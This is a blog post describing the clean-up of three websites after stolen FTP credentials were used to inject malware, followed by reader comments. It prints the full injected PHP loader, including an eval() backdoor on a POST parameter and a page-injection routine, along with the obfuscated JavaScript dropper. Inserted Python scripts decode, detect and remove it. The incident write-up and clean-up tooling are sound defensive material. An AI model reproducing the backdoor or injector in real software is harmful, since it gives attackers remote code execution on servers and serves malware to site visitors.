My Sites Are Hacked – Here’s How I Fixed It

by Abel

About two weeks ago, my websites were hacked. Not one, not two, but three! If you face the same problem, this post might be useful to you, as I outline the steps I have taken to overcome the problem and prevent it from happening again.

SYMPTOMS

Your site is down with an error like this:

Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1

Upon checking, most of the main PHP, HTML and JavaScript files have been altered. The following block is prepended to the top of each PHP file as one long line, before the original contents (shown here with plain ASCII quotes and dashes, which is what the injected code actually contains; the blog's rendering had turned them into typographic ones):

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Two things in that block matter for the clean-up. First, eval($_POST['tmp_lkojfghx3']) is a backdoor: anyone who knows the parameter name can run arbitrary PHP on the server by POSTing to any infected page, with no FTP password needed, so the files have to be cleaned even after the password is changed. Second, the rest of the block installs an output-buffer callback (tmp_lkojfghx) through a fake error handler, so every page the script renders gets the base64-decoded script tag inserted just before <body> at request time, after first stripping any other long, obfuscated script blocks it finds in the output. Because the insertion happens when the page is served, removing the JavaScript from the HTML files alone does nothing while the PHP prefix remains.

The following code is appended at the bottom of the HTML and JS (JavaScript) files:

<!--
document.write(unescape('%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E').replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,""));
-->

If you look closely, the files that have been hacked/changed all carry the same modification timestamp (same date and time). I believe the attackers used an automated tool to make the changes.
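As an added example (not part of the original post), the following Python script decodes the loader above: it pulls the base64_decode('...') constant out of the PHP prefix, decodes it to the script block, and then applies the same unescape().replace() transformation the JavaScript performs, so you can see the tag a visitor's browser would actually execute. The only inputs are the strings copied from the two samples on this page; the function names are my own.

```python
import base64
import re

# Copied from the two samples above: the define() call carrying the base64
# payload (PHP prefix) and the document.write() line appended to HTML/JS files.
SAMPLE_PHP_DEFINE = (
    "define('TMP_XHGFJOKL',base64_decode('"
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCcl"
    "M0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQ"
    "JTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZq"
    "cmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsK"
    "IC0tPjwvc2NyaXB0Pg=="
    "'))"
)
SAMPLE_JS = (
    "document.write(unescape('%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP"
    "%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E')"
    '.replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,""));'
)


def js_unescape(s):
    """Emulate the legacy JavaScript unescape(): %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


DOC_WRITE = re.compile(r"unescape\('([^']*)'\)\.replace\(/([^/]+)/g,\s*\"\"\)")


def decode_document_write(js):
    """Return what document.write(unescape('...').replace(/a|b/g,"")) emits,
    or None if the text does not contain that construct."""
    m = DOC_WRITE.search(js)
    if not m:
        return None
    encoded, alternation = m.group(1), m.group(2)
    # A JavaScript /a|b|c/g replace scans left to right trying the alternatives
    # in order, which is what re.sub does with the same pattern. The pattern is
    # attacker data; for this sample it contains only literal tokens.
    return re.sub(alternation, "", js_unescape(encoded))


def decode_php_constant(php):
    """Pull the base64 payload out of the PHP prefix and decode it twice:
    base64 -> the <script> block, then the block's own obfuscation -> the tag."""
    m = re.search(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", php)
    if not m:
        return None, None
    block = base64.b64decode(m.group(1)).decode("latin-1")
    return block, decode_document_write(block)


def script_src(tag):
    """The src= target of a decoded <script> tag: the host to block and hunt for."""
    m = re.search(r"src=[\"']?([^\s\"'>]+)", tag)
    return m.group(1) if m else None


if __name__ == "__main__":
    block, tag = decode_php_constant(SAMPLE_PHP_DEFINE)
    print(block)
    print(tag, "->", script_src(tag))
```

The decoded tag is what to search your server logs and the rest of your sites for: the loader strips competing obfuscated scripts from the rendered page, so the only external script a visitor should be pulling from an infected site is the one this decode reveals.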

POSSIBLE CAUSES

Three of my websites were hacked, and coincidentally these are the sites I had uploaded to with the FTP client Filezilla the night before. I suspect the hackers used a keylogger or spyware to steal my FTP logins. Then, using the stolen credentials, they logged in to my sites and prepended the above code to my pages.

(NOTE: It was later confirmed that the FTP connection was the route in. I tried updating a site using Filezilla and, sure enough, the site was hacked again the next day. The other two sites, which were updated with a web-based FTP client, remained intact.)

I searched on the Internet and found that many people have experienced the same problem, but no solution was offered.

SOLUTIONS

Step 1:

There are two possible causes: either your web server or your computer has been compromised. Before you do anything, use Lavasoft Ad-Aware (IMPORTANT: for anti-virus, do NOT use AVG Free, as it caused another problem for me, an inability to browse the Net; use Avira instead) or Spybot S&D (free) to detect and remove any spyware from your computer. You may want to scan your computer on a regular basis from now on.

(UPDATE: Yesterday I used Malwarebytes (malwarebytes.org) to scan for and remove some additional spyware that had gone undetected by Spybot and Avira. After the scan I used Filezilla to upload some files to a website, and the site has stayed clean so far. CONCLUSION: Malwarebytes found and fixed the problem where Avira, Spybot and Lavasoft did not. Use it in the first place.)

Step 2:

Make sure you change your FTP passwords in cPanel first, before anything else, and do it from the machine you have just cleaned: a new password typed on a still-infected PC is captured just like the old one. To be safe, I now use a web-based FTP client instead of Filezilla to edit, upload and rename files. I don't want my new passwords to be stolen over the FTP connection again.

NOTE: There is a daily limit on transfer volume when you use net2ftp.com. However, you can install net2ftp on your own server.

Then take one of the steps below:

Option One: Restore from Backup

Depending on your web host, you can either restore your website yourself or you have to ask the support team to do it for you. You want to revert the website to the day before it was hacked. Before putting the restored files live, search them for the strings shown above (tmp_lkojfghx, document.write(unescape): a backup taken after the injection simply puts the backdoor back.

Option Two: Do It Yourself

If you don't have a backup from cPanel or your web host, you have no choice but to do this. This is the most time-consuming option. Using a web-based FTP client, upload clean HTML and PHP pages (without the injected code shown above) from your own backup on your PC to the server, provided, of course, that you have a mirror copy of your web pages.

If you don't, do this: edit the affected files directly in net2ftp.com online, removing the injected block from the top of each PHP file and from the bottom of each HTML and JS file.

I still find that using net2ftp to download the files to the desktop, editing them with Dreamweaver, and then uploading them back to the server with net2ftp is faster.

For the MySQL databases, I am not sure whether I need to make any changes to rectify this problem. They seem not to be affected.

Try NOT to use Filezilla, to avoid your passwords being stolen again. Note that plain FTP also sends the username and password in clear text over the network, so if you do go back to a desktop client, connect with SFTP or FTPS rather than FTP.

When you take these steps, you will get your website up and running again.
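The "Do It Yourself" clean-up above, as an added example script (this is not the author's method and not from any project): it walks a web root, detects the PHP prefix by its opening and closing markers and the document.write(unescape(...)) tail by its shape, strips them, and groups files by modification minute so that a mass edit with a single timestamp stands out. The sample files it builds are constructed for the demonstration; the loader body in them is abbreviated to the markers the detector keys on.

```python
import os
import re
import tempfile
from collections import defaultdict

# Opening and closing markers of the PHP prefix shown under SYMPTOMS; the body in
# between is not matched, so small variants of the loader are still caught.
PHP_LOADER = re.compile(
    r"\A\s*<\?php if\(!function_exists\('tmp_lkojfghx'\)\).*?tmp_lkojfghx2\(\); \?>\s*",
    re.DOTALL,
)
# The block appended to HTML and JS files, with or without <script> tags around it.
JS_TAIL = re.compile(
    r"(?:<script[^>]*>\s*)?<!--\s*document\.write\(unescape\('[^']*'\)"
    r'\.replace\(/[^/]+/g,\s*""\)\);\s*-->(?:\s*</script>)?\s*\Z',
    re.DOTALL,
)
# The eval() backdoor inside the loader; if it survives cleaning, inspect by hand.
BACKDOOR = re.compile(r"eval\(\$_POST\['tmp_lkojfghx3'\]\)")
EXTENSIONS = {".php": "php", ".html": "html", ".htm": "html", ".js": "js"}


def clean_text(text, kind):
    """Strip the known injections from one file's content; return (text, hits)."""
    hits = []
    if kind == "php":
        text, n = PHP_LOADER.subn("", text, count=1)
        if n:
            hits.append("php-loader")
    text, n = JS_TAIL.subn("", text, count=1)
    if n:
        hits.append("js-tail")
    if BACKDOOR.search(text):
        hits.append("backdoor-remains")
    return text, hits


def scan_tree(root, fix=False):
    """Walk root; return {relative path: [hits]}; rewrite files only when fix=True."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            kind = EXTENSIONS.get(os.path.splitext(name)[1].lower())
            if kind is None:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            cleaned, hits = clean_text(original, kind)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
                if fix and cleaned != original:
                    with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                        fh.write(cleaned)
    return report


def mtime_clusters(root):
    """Group web files by modification minute; a tool-made bulk edit is one big bucket."""
    buckets = defaultdict(list)
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in EXTENSIONS:
                path = os.path.join(dirpath, name)
                minute = int(os.stat(path).st_mtime // 60)
                buckets[minute].append(os.path.relpath(path, root).replace(os.sep, "/"))
    return dict(buckets)


# Constructed sample data: real markers, abbreviated loader body, fake timestamps.
SAMPLE_LOADER = (
    "<?php if(!function_exists('tmp_lkojfghx')){"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "/* constructed stand-in for the rest of the loader body */"
    "}tmp_lkojfghx2(); ?>\n"
)
SAMPLE_TAIL = "<!--\ndocument.write(unescape('%3Cscript%3E').replace(/x/g,\"\"));\n-->\n"
CLEAN_FILES = {
    "index.php": "<?php\necho 'hello';\n",
    "about.html": "<html><body><p>about</p></body></html>\n",
    "js/app.js": "function f(){return 1;}\n",
    "contact.html": "<html><body><p>contact</p></body></html>\n",
}
INFECTED = {"index.php", "about.html", "js/app.js"}
INJECTED_AT = 1238000000  # constructed epoch time shared by every injected file


def build_sample_tree(root):
    for rel, body in CLEAN_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        text = body
        if rel in INFECTED:
            text = SAMPLE_LOADER + body if rel.endswith(".php") else body + SAMPLE_TAIL
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        stamp = INJECTED_AT if rel in INFECTED else INJECTED_AT + 7 * 86400
        os.utime(path, (stamp, stamp))


def demo():
    """Build the sample tree, triage by timestamp, clean it, and verify the result."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        clusters = mtime_clusters(root)
        before = scan_tree(root, fix=True)
        after = scan_tree(root)
        restored = all(
            open(os.path.join(root, rel), encoding="utf-8").read() == body
            for rel, body in CLEAN_FILES.items()
        )
    return {"clusters": clusters, "before": before, "after": after, "restored": restored}


if __name__ == "__main__":
    print(demo())
```

Run it with no arguments for the demonstration, or call scan_tree('/path/to/public_html') first without fix=True to get the report, and only rewrite once you have a backup. Any file reported as backdoor-remains has the eval() call outside the block the regex knows about and needs a manual look; a loader that has been re-obfuscated will not match these markers at all, which is why the integrity check under the preventive measures is still worth having.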

PREVENTIVE MEASURES

Scan your computer regularly using Spybot or Lavasoft Ad-Aware (for anti-virus, do not use AVG Free; use Avira instead). Install a firewall to protect your computer from spyware and viruses.

(UPDATE: Malwarebytes.org is the best for this problem.)

Back up your website on a regular basis using cPanel, and take a backup whenever you have made changes. You can also use a WordPress plugin to automate the backup process. When your site is hacked, backups come in very handy; you will be very glad you have them.
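One way to make "which files changed?" answerable after the next FTP session, as an added example (not part of the original post): record a SHA-256 manifest of the web root after a clean deploy, keep it off the server, and diff a fresh snapshot against it. The sample tree, file names and manifest path below are constructed for the demonstration.

```python
import hashlib
import json
import os
import tempfile


def file_sha256(path):
    """SHA-256 of a file, read in chunks so large uploads are handled."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root, skip_dirs=("cache", "tmp")):
    """Map every file under root (relative, POSIX-style path) to its hash."""
    manifest = {}
    for dirpath, dirnames, files in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            manifest[rel] = file_sha256(path)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def diff_manifests(baseline, current):
    """Files that appeared, vanished, or changed content since the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Constructed scenario: baseline a clean site, then mimic the incident
    (PHP prefix, HTML tail, one dropped file) and report the differences."""
    with tempfile.TemporaryDirectory() as work:
        site = os.path.join(work, "public_html")
        _write(site, "index.php", "<?php\necho 'hello';\n")
        _write(site, "about.html", "<html><body>about</body></html>\n")
        _write(site, "js/app.js", "function f(){return 1;}\n")
        # Keep the baseline outside the web root: anyone holding the FTP
        # password could otherwise rewrite it along with the pages.
        baseline_path = os.path.join(work, "baseline.sha256.json")
        save_manifest(build_manifest(site), baseline_path)

        # Simulated injection with the same shape as the incident on this page.
        _write(site, "index.php", "<?php /* loader */ ?>\n<?php\necho 'hello';\n")
        _write(site, "about.html", "<html><body>about</body></html>\n<!-- document.write(...) -->\n")
        _write(site, "js/jquery.js", "/* dropped file */\n")

        return diff_manifests(load_manifest(baseline_path), build_manifest(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The manifest should be regenerated only from a deploy you trust and stored where the FTP account cannot reach it (your PC, or a separate host); a manifest kept inside public_html can be rewritten by the same stolen credentials that rewrote the pages. Running the diff from cron on the server still catches the web-root changes, as long as the script and baseline live outside the FTP user's reach.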

There you go. It has been a great learning experience for me, as it had never crossed my mind that my sites would be hacked.



COMMENTS

Bruce Jones April 7, 2009 at 1:37 pm

You are not alone, ;-) I had the same thing happen with some of my clients sites. It is nice to know that someone else solved the problem also.

Rick Foreman May 5, 2009 at 4:14 am

Thanks for figuring out this problem. We've been plagued with it for a month, even tried changing hosts; yours is the first reasonable explanation I've found.

Mark May 5, 2009 at 8:18 pm

Just passing by and want to bring up something you may have missed. Change the account/password for your MySQL database, since the person who hacked you had access to your PHP files, and some of those files probably contained the account/password used to connect to your database.

Denis May 6, 2009 at 10:22 pm

Hi,

Great post!

Just a few questions.

Did you use the FileZilla in the FTP or SFTP mode?
Did you store the passwords in FileZilla or typed them in every time you uploaded files?
Do you remember the malware names found by Malwarebytes?

Name May 10, 2009 at 7:57 am

Comments not working!

Name May 10, 2009 at 7:57 am

Never mind, they work if I enter email and website. Here is the original comment I was trying to post:

First, I didn't use my F-Secure anti-virus at all, as it slowed down my PC too much, and I got a wpv[NUMBERS].exe virus from my very own website. I immediately deleted it, and 20 minutes later my computer crashed and didn't boot anymore.
I fully reinstalled Windows and noticed 2 of my websites had been infected by the virus. I removed the code from the PHP and HTML files, and it got hacked again and again!
It's not a keylogger, as I fixed the website from a FULLY clean Windows installation. (Though I visited the website and noticed F-Secure block a virus.)
I'm not using any CMS/forum system; I just have the infosniper IP query script and PJIRC, nothing else.
I tried setting the permissions on all my files to 555, but after it got hacked the permissions were 755 again..

I also contacted my host: NO ONE has logged into cPanel or FTP with my logins!
According to them it's done remotely via an internet browser using a glitch in PHP scripting; they blame my PHP scripts.
Since no one logged in using my logins I thought there was no use changing my passwords, but now, after getting hacked a 3rd time, I finally changed them myself and will see if it helps at all..

There is a "solution" on the cPanel forums which is similar to yours.
http://forums.cpanel.net/showthread.php?t=78595

Neither this post of yours nor the one on cPanel helped me.. :(

Admin May 11, 2009 at 5:27 am

@Denis: Answers to your questions:

1. I used FTP mode only but I changed to SFTP after this incident.

2. It doesn't matter, I think. Either way is vulnerable, as the login details are leaked over the FTP connection.

3. No, I don't. But later I noticed Malwarebytes had overlooked this spyware. I manually removed the culprit from the registry after I found out the exact spyware. I should have updated this post with the latest findings but didn't get the time to do it.

Jimi May 19, 2009 at 2:26 am

I suppose the reason he was asking question 2 was: if the passwords were saved, then the script could have just located them once it was on your computer, thus identifying how the script works.

Mike June 8, 2009 at 9:20 pm

My sites are being hacked.

I'm using FileZilla. I've searched and found out that most of the hacked sites were using FileZilla AND an older version of Adobe Reader 8.

Is everybody using Adobe Reader 8 when their sites were hacked?

http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

thanks,
Mike

Brian July 8, 2009 at 4:36 pm

Hi, I had a keylogger trojan on my home PC. They captured my FTP username and password, then attacked the site using the iframe attack. I pulled the whole site down; what a nightmare. You need to download KeyScrambler straight away: this plugin scrambles the letters you type into the browser. Do not log in to your FTP or website from anyone else's computer or an internet cafe etc., in case the trojan is present. If it happens, change your email passwords too, store your username and password on a piece of paper, and do a weekly scan of your computer with SUPERAntiSpyware. Trust me, you will pull your head off if it happens.

